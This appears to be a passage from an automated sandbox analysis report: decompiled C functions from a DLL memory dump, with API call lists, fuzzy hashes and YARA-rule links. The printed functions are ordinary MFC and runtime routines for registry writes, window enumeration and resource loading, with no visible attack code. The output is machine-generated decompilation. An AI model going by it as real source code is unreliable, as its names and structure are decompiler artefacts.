				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x1006d940; // 0xc2bf211
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					swprintf( &_v24, 0x10, 0x10060c2c, _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(_t30 + 0x68));
				} else {
					_t30 = E1001B460(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E1003F29E(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

0x1001b513
0x1001b51b
0x1001b522
0x1001b526
0x1001b52a
0x1001b531
0x1001b534
0x1001b574
0x1001b585
0x1001b536
0x1001b53c
0x1001b540
0x1001b54e
0x1001b555
0x1001b557
0x1001b561
0x1001b561
0x1001b540
0x1001b599

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?), ref: 1001B54E
RegCloseKey.ADVAPI32(00000000), ref: 1001B557
swprintf.LIBCMT ref: 1001B574
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1001B585

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: 858c56c6b90933a8aa4b394fa1cc15fea543a489b8f30e682cca6e55b8af1dae
Instruction ID: 31c078b36fb5f5bbe3c0761986314761095854af1f945d034cba20af8212f31e
Opcode Fuzzy Hash: 858c56c6b90933a8aa4b394fa1cc15fea543a489b8f30e682cca6e55b8af1dae
Instruction Fuzzy Hash: 8B01AD72500619BBEB10DF648C85FAF77BDEF48714F100829FA01EB191DB74EA0587A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000F6EE, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000F6EE(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000EC15(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1000F403(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1000F6EE(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

0x1000f6ee
0x1000f6ee
0x1000f6f8
0x1000f6fe
0x1000f761
0x1000f761
0x1000f765
0x00000000
0x00000000
0x1000f702
0x1000f706
0x1000f730
0x1000f708
0x1000f709
0x1000f70e
0x1000f710
0x1000f712
0x1000f715
0x1000f718
0x1000f71b
0x1000f71e
0x1000f71f
0x1000f71f
0x1000f710
0x1000f736
0x1000f73a
0x1000f73d
0x1000f73f
0x1000f741
0x1000f753
0x1000f753
0x1000f741
0x1000f75b
0x1000f75b
0x1000f76a

APIs

GetTopWindow.USER32(00000000), ref: 1000F6FE
GetTopWindow.USER32(00000000), ref: 1000F73D
GetWindow.USER32(00000000,00000002), ref: 1000F75B

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: f75a1f818b9d0f8029a351ad262002a07eda59272f9010a1bb6de9bb8f598020
Instruction ID: 0df8c17ad2851e385d3716f8655bea402a8a809e37641a7437afefc36b2759cb
Opcode Fuzzy Hash: f75a1f818b9d0f8029a351ad262002a07eda59272f9010a1bb6de9bb8f598020
Instruction Fuzzy Hash: 0C01293600452ABBEF129F919C44EAF3B66EF483D0F014018FA0855465DB36C962FBA2

Uniqueness

Uniqueness Score: -1.00%

Function 10029872, Relevance: 6.0, APIs: 4, Instructions: 49
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E10029872(void* __ecx, short* _a4) {
				int _v8;
				int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t9;
				char* _t10;
				char* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t17 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if(_a4 != 0) {
					__imp__#7(_a4, _t18, _t14);
					_v12 = _t9;
					_t10 = WideCharToMultiByte(0, 0, _a4, _t9, 0, 0, 0, 0);
					_v8 = _t10;
					__imp__#150(0, _t10);
					_t15 = _t10;
					__eflags = _t15;
					if(__eflags == 0) {
						E1000A595(_t15, _t17, WideCharToMultiByte, 0, __eflags);
					}
					WideCharToMultiByte(0, 0, _a4, _v12, _t15, _v8, 0, 0);
					_t12 = _t15;
				} else {
					_t12 = 0;
				}
				return _t12;
			}

0x10029872
0x10029877
0x10029878
0x1002987f
0x1002988a
0x1002989e
0x100298a3
0x100298a7
0x100298aa
0x100298b0
0x100298b2
0x100298b4
0x100298b6
0x100298b6
0x100298c9
0x100298cc
0x10029881
0x10029881
0x10029881
0x100298d1

APIs

SysStringLen.OLEAUT32(00000000), ref: 1002988A
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,1003E45B,?,00000018,1003E799,?,?,?), ref: 100298A3
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 100298AA
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,1003E45B,?,00000018,1003E799,?,?,?), ref: 100298C9

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: f9e69f56b42acfe772b976eed4cbafd6e8d91300ea8e477c00ac94a2270f3b8a
Instruction ID: b2007231b0ff0fd9b54f33b6cb120ee8cc4a7c01476340366daa739d147f6d86
Opcode Fuzzy Hash: f9e69f56b42acfe772b976eed4cbafd6e8d91300ea8e477c00ac94a2270f3b8a
Instruction Fuzzy Hash: DFF0FFB6502138BFEB225BA2DC4CCDFBEADEF8A2E47154025F90892110D6715E51DAF0

Uniqueness

Uniqueness Score: -1.00%

Function 1000EF35, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000EF35(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E1000EF35(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000EBE9(_t13, _t14);
						}
						_t10 = E1000EC15(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E1000EF35(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

0x1000ef35
0x1000ef35
0x1000ef42
0x1000ef48
0x1000ef4e
0x1000ef52
0x1000ef82
0x1000ef85
0x1000efa2
0x1000efa2
0x1000efa4
0x1000efa6
0x00000000
0x00000000
0x1000ef90
0x1000ef95
0x1000ef97
0x1000ef9c
0x00000000
0x1000ef9c
0x00000000
0x1000ef97
0x1000ef54
0x1000ef59
0x1000ef6b
0x1000ef6f
0x1000ef70
0x00000000
0x1000ef72
0x1000ef79
0x1000ef7e
0x1000ef80
0x00000000
0x00000000
0x1000ef5b
0x1000ef62
0x1000ef69
0x00000000
0x00000000
0x1000ef69
0x1000ef59
0x1000efab
0x1000efab

APIs

GetDlgItem.USER32 ref: 1000EF42
GetTopWindow.USER32(00000000), ref: 1000EF55

Part of subcall function 1000EF35: GetWindow.USER32(00000000,00000002), ref: 1000EF9C

GetTopWindow.USER32(?), ref: 1000EF85

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: beed0a41e0afe512a0b72253fec3077ed023126fc4fac657fc438ed6d249aad9
Instruction ID: a7f177c8f48bb4e758ccafc79bcb60b01d173a4ad7d454735b3b073eba887531
Opcode Fuzzy Hash: beed0a41e0afe512a0b72253fec3077ed023126fc4fac657fc438ed6d249aad9
Instruction Fuzzy Hash: 7C01A7361456EBB7FB129F658C04EAF3A95EF853D1F064130FC04B5118DB71DE119A91

Uniqueness

Uniqueness Score: -1.00%

Function 10012024, Relevance: 6.0, APIs: 4, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E10012024(intOrPtr __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				struct HRSRC__* _t10;
				void* _t13;
				void* _t18;
				void* _t20;
				void* _t21;
				struct HINSTANCE__* _t23;

				_push(__ecx);
				_push(_t20);
				_t13 = 0;
				_t18 = 0;
				_v8 = __ecx;
				_t24 = _a4;
				if(_a4 == 0) {
					L4:
					_t21 = E10011B9E(_v8, _t18, _t18);
					if(_t18 != 0 && _t13 != 0) {
						FreeResource(_t13);
					}
					_t7 = _t21;
				} else {
					_t23 =  *(E1001F108(0, 0, _t20, _t24) + 0xc);
					_t10 = FindResourceA(_t23, _a4, 0xf0);
					if(_t10 == 0) {
						goto L4;
					} else {
						_t7 = LoadResource(_t23, _t10);
						_t13 = _t7;
						if(_t13 != 0) {
							_t18 = LockResource(_t13);
							goto L4;
						}
					}
				}
				return _t7;
			}

0x10012029
0x1001202b
0x1001202d
0x1001202f
0x10012031
0x10012034
0x10012037
0x1001206b
0x10012074
0x10012078
0x1001207f
0x1001207f
0x10012085
0x10012039
0x1001203e
0x1001204a
0x10012052
0x00000000
0x10012054
0x10012056
0x1001205c
0x10012060
0x10012069
0x00000000
0x10012069
0x10012060
0x10012052
0x1001208b

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1001204A
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,100162DC,?,?,100022B1), ref: 10012056
LockResource.KERNEL32(00000000,?,?,?,?,?,100162DC,?,?,100022B1), ref: 10012063
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,100162DC,?,?,100022B1), ref: 1001207F

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 320444c93fe637e3ce96fc886195a3ca6c05c08e6bd26434381fc1306e21a3e5
Instruction ID: a76f3ad2de1d6d89c58dd0c4c4508bf563647d6159c472a004892cf580b4a19a
Opcode Fuzzy Hash: 320444c93fe637e3ce96fc886195a3ca6c05c08e6bd26434381fc1306e21a3e5
Instruction Fuzzy Hash: 9AF0C8B7600612BBE7118FA59CC896BBBECDF8C6917064139FA0597112DE70DD50C660

Uniqueness

Uniqueness Score: -1.00%

Function 1000CFF8, Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CFF8(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t21;
				void* _t22;
				void* _t23;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E1002715C(_t21, _t22, _t23, _a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}

0x1000d004
0x1000d069
0x00000000
0x1000d00c
0x1000d00c
0x1000d012
0x00000000
0x1000d02f
0x1000d038
0x1000d044
0x1000d04a
0x1000d050
0x1000d054
0x1000d054
0x1000d05e
0x00000000
0x1000d066
0x1000d012

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 1000D038
SetBkColor.GDI32(00000000,00000000), ref: 1000D044
GetSysColor.USER32(00000008), ref: 1000D054
SetTextColor.GDI32(00000000,?), ref: 1000D05E

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$ObjectText
String ID:
API String ID: 829078354-0
Opcode ID: 369266a78fd03a4208c1d076bfc21740a4cb52441e82470e4d7135c4e4ff542a
Instruction ID: 40f84f8c5a37b02cd6b43e533dc0d9588e04d1defb51a7ba2f302ec34b6a4d6e
Opcode Fuzzy Hash: 369266a78fd03a4208c1d076bfc21740a4cb52441e82470e4d7135c4e4ff542a
Instruction Fuzzy Hash: FA014F30500205ABFF51AF60EC45BAE3BE5EB093D1F104612F91AC20A9C771CCA2CA61

Uniqueness

Uniqueness Score: -1.00%

Function 100167B8, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E100167B8(intOrPtr __ecx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t21;
				struct HINSTANCE__* _t22;

				_push(__ecx);
				_push(_t21);
				_push(_t18);
				_v8 = __ecx;
				_t14 = 0;
				_t22 =  *(E1001F108(0, _t18, _t21, __eflags) + 0xc);
				_t19 = LoadResource(_t22, FindResourceA(_t22, _a4, 5));
				_t26 = _t19;
				if(_t19 != 0) {
					_t14 = LockResource(_t19);
				}
				_t9 = E10016409(_t14, _v8, _t19, _t22, _t26, _t14, _a8, _t22);
				FreeResource(_t19);
				return _t9;
			}

0x100167bd
0x100167bf
0x100167c0
0x100167c1
0x100167c4
0x100167cb
0x100167e2
0x100167e4
0x100167e6
0x100167ef
0x100167ef
0x100167f9
0x10016801
0x1001680d

APIs

FindResourceA.KERNEL32(?,?,00000005), ref: 100167D4
LoadResource.KERNEL32(?,00000000), ref: 100167DC
LockResource.KERNEL32(00000000), ref: 100167E9
FreeResource.KERNEL32(00000000,00000000,?,?), ref: 10016801

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 67c2b23a1acec456d4c49100d6ba8e45b4e34ffdf82fc1c5bbaed562d3a834b9
Instruction ID: 9651b0b72d1441a41af86fda70961b49dae6145045632d08f7b7ed2a7c7f4da1
Opcode Fuzzy Hash: 67c2b23a1acec456d4c49100d6ba8e45b4e34ffdf82fc1c5bbaed562d3a834b9
Instruction Fuzzy Hash: 31F0E937200120BBD7019BA59C8CC9FFBBCDF8D6A17014029F605D7211DA71DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 10048413, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10048413(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x10068c58);
				E10041DB8(__ebx, __edi, __esi);
				_t28 = E100473F1(__ebx, __edx, __edi, _t30);
				_t13 =  *0x1006e20c; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E10046515(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x1006e2f0; // 0x1006e218
					 *((intOrPtr*)(_t29 - 0x1c)) = E100483D5(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E1004847D();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E100473F1(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E10042754(_t25, _t26, 0x20);
				}
				return E10041DFD(_t28);
			}

0x10048413
0x10048413
0x10048413
0x10048413
0x10048413
0x10048415
0x1004841a
0x10048424
0x10048426
0x1004842e
0x10048452
0x10048454
0x1004845a
0x1004845e
0x10048461
0x1004846c
0x1004846f
0x10048476
0x10048430
0x10048430
0x10048434
0x00000000
0x10048436
0x1004843b
0x1004843b
0x10048434
0x10048440
0x10048444
0x10048449
0x10048451

APIs

__getptd.LIBCMT ref: 1004841F

Part of subcall function 100473F1: __getptd_noexit.LIBCMT ref: 100473F4
Part of subcall function 100473F1: __amsg_exit.LIBCMT ref: 10047401

__getptd.LIBCMT ref: 10048436
__amsg_exit.LIBCMT ref: 10048444
__lock.LIBCMT ref: 10048454

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: e8c2f2bcfb7ddd2d8dd32ce953ff22551012f365d256b8b10b11838208fac49e
Instruction ID: 347ff1311cdb9e77f788bc73578c5098ae4b2c44d1a0793d1a9a387720954bd1
Opcode Fuzzy Hash: e8c2f2bcfb7ddd2d8dd32ce953ff22551012f365d256b8b10b11838208fac49e
Instruction Fuzzy Hash: 26F06D35E40722DBE710DB648802B8D73A0EB40761F314A39E841D7681CB707F01DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 100042B0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100042B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* __ebp;
				void* _t150;
				intOrPtr _t158;
				intOrPtr _t197;
				void* _t204;
				void* _t205;

				_t205 = __esi;
				_t204 = __edi;
				_t150 = __ebx;
				if(_a16 != 0) {
					 *_a16 = 0;
				}
				_v36 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) - 0xc));
				if(_v36 == 0) {
					_v60 = _a4 + 8;
					E10002B30(_v60, _a4 + 4);
				}
				if(_a8 != 0) {
					_v64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) - 0xc));
					_v12 = _v64;
					_v72 = _a4 + 8;
					_v68 =  *_v72 - 0x10;
					 *((intOrPtr*)(_v68 + 0xc)) - 1 =  *((intOrPtr*)(_v68 + 0xc)) - 0x00000001 > 0x00000000 & 0x000000ff;
					if(( *((intOrPtr*)(_v68 + 0xc)) - 0x00000001 > 0x00000000 & 0x000000ff) != 0) {
						E10001780(_v72,  *((intOrPtr*)(_v68 + 4)));
					}
					_v8 =  *_v72;
					__eflags = _v8;
					if(_v8 != 0) {
						_v28 = _v8 + _v12;
						__eflags = _v28 - _v12;
						if(_v28 >= _v12) {
							_v16 = _v28;
							_v28 = _v8 +  *((intOrPtr*)(_a4 + 0xc));
							_t158 = _a4;
							__eflags = _v28 -  *((intOrPtr*)(_t158 + 0xc));
							if(_v28 >=  *((intOrPtr*)(_t158 + 0xc))) {
								_v24 = _v28;
								__eflags = _v24 - _v16;
								if(_v24 < _v16) {
									_v32 = _v16 - _v24;
									__eflags = _v32 - _a12;
									if(_v32 >= _a12) {
										_v108 = _a12;
									} else {
										_v108 = _v32;
									}
									_v20 = _v108;
									__eflags = _v20;
									if(_v20 > 0) {
										_t160 = _a12;
										_v88 = E1003F525(_t150, _a12, _a8, _a12, _v28, _v20);
										_v112 = _v88;
										__eflags = _v112 - 0x50;
										if(__eflags > 0) {
											L26:
											E1000A5CD(_t150, _t160, _t204, _t205, __eflags);
											L27:
											__eflags = _a16;
											if(_a16 != 0) {
												 *_a16 = _v20;
											}
											 *((intOrPtr*)(_a4 + 0xc)) =  *((intOrPtr*)(_a4 + 0xc)) + _v20;
											_v104 = 0;
											_v100 = _a4 + 8;
											__eflags = _v104 - 0xffffffff;
											if(_v104 == 0xffffffff) {
												_v92 =  *((intOrPtr*)( *_v100 - 8));
												_v96 =  *_v100;
												__eflags = _v96;
												if(_v96 != 0) {
													_v104 = E1003FB51(_v96, _v92);
												} else {
													_v104 = 0;
												}
											}
											__eflags = _v104;
											if(_v104 < 0) {
												L35:
												E10001000(0x80070057);
												goto L36;
											} else {
												_t197 =  *_v100;
												__eflags = _v104 -  *((intOrPtr*)(_t197 - 8));
												if(_v104 <=  *((intOrPtr*)(_t197 - 8))) {
													L36:
													 *((intOrPtr*)( *_v100 - 0xc)) = _v104;
													 *((char*)( *_v100 + _v104)) = 0;
													__eflags = 0;
													return 0;
												}
												goto L35;
											}
										}
										_t75 = _v112 + 0x10004504; // 0xcccccc00
										switch( *((intOrPtr*)(( *_t75 & 0x000000ff) * 4 +  &M100044F4))) {
											case 0:
												goto L27;
											case 1:
												E1000A595(_t150, _t168, _t204, _t205, __eflags);
												goto L27;
											case 2:
												__eax = E1000A5CD(__ebx, __ecx, __edi, __esi, __eflags);
												goto L27;
											case 3:
												goto L26;
										}
									} else {
										 *((intOrPtr*)(_a4 + 0xc)) = 0;
										E10002800(_a4 + 8);
										return 1;
									}
								}
								return 1;
							}
							return 0x8000ffff;
						}
						return 0x8000ffff;
					} else {
						return 0x8000ffff;
					}
				} else {
					return 0x80004003;
				}
			}

0x100042b0
0x100042b0
0x100042b0
0x100042ba
0x100042bf
0x100042bf
0x100042ce
0x100042d5
0x100042dd
0x100042ea
0x100042ea
0x100042f3
0x10004308
0x1000430e
0x10004317
0x10004322
0x10004334
0x10004336
0x10004342
0x10004342
0x1000434c
0x1000434f
0x10004353
0x10004365
0x1000436b
0x1000436e
0x1000437d
0x10004389
0x1000438c
0x10004392
0x10004395
0x100043a4
0x100043aa
0x100043ad
0x100043bf
0x100043c5
0x100043c8
0x100043d5
0x100043ca
0x100043cd
0x100043cd
0x100043db
0x100043de
0x100043e2
0x1000440b
0x1000441b
0x10004421
0x10004424
0x10004428
0x1000444b
0x1000444b
0x10004450
0x10004450
0x10004454
0x1000445c
0x1000445c
0x1000446a
0x1000446d
0x1000447a
0x1000447d
0x10004481
0x1000448b
0x10004493
0x10004496
0x1000449a
0x100044b5
0x1000449c
0x1000449c
0x1000449c
0x1000449a
0x100044b8
0x100044bc
0x100044cb
0x100044d0
0x00000000
0x100044be
0x100044c1
0x100044c6
0x100044c9
0x100044d5
0x100044dd
0x100044e8
0x100044ec
0x00000000
0x100044ec
0x00000000
0x100044c9
0x100044bc
0x1000442d
0x10004434
0x00000000
0x00000000
0x00000000
0x1000443b
0x00000000
0x00000000
0x10004442
0x00000000
0x00000000
0x00000000
0x00000000
0x100043e4
0x100043e7
0x100043f4
0x00000000
0x100043f9
0x100043e2
0x00000000
0x100043af
0x00000000
0x10004397
0x00000000
0x10004355
0x00000000
0x10004355
0x100042f5
0x00000000
0x100042f5

Strings

P, xrefs: 10004424

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

